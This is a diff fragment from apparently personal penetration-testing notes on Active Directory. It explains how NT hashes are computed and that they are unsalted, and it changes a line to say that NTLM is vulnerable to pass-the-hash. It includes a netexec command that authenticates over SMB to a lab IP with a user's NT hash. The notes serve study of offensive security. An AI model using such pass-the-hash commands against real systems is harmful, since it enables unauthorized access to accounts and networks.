kiro6/penetration-testing-notes/Operating Systems/Windows/Active Directory.md

   - the NT hash, which is the MD4 hash of the little-endian UTF-16 value of the password.
 The algorithm can be visualized as: MD4(UTF-16-LE(password)).
   - Neither LANMAN nor NTLM uses a salt.

-- NTLMv1 is also vulnerable to the pass-the-hash attack.
+- NTLM is also vulnerable to the pass-the-hash attack.
 ```bash
 netexec smb 10.129.41.19 -u rachel -H e46b9e548fa0d122de7f59fb6d48eaa2
 ```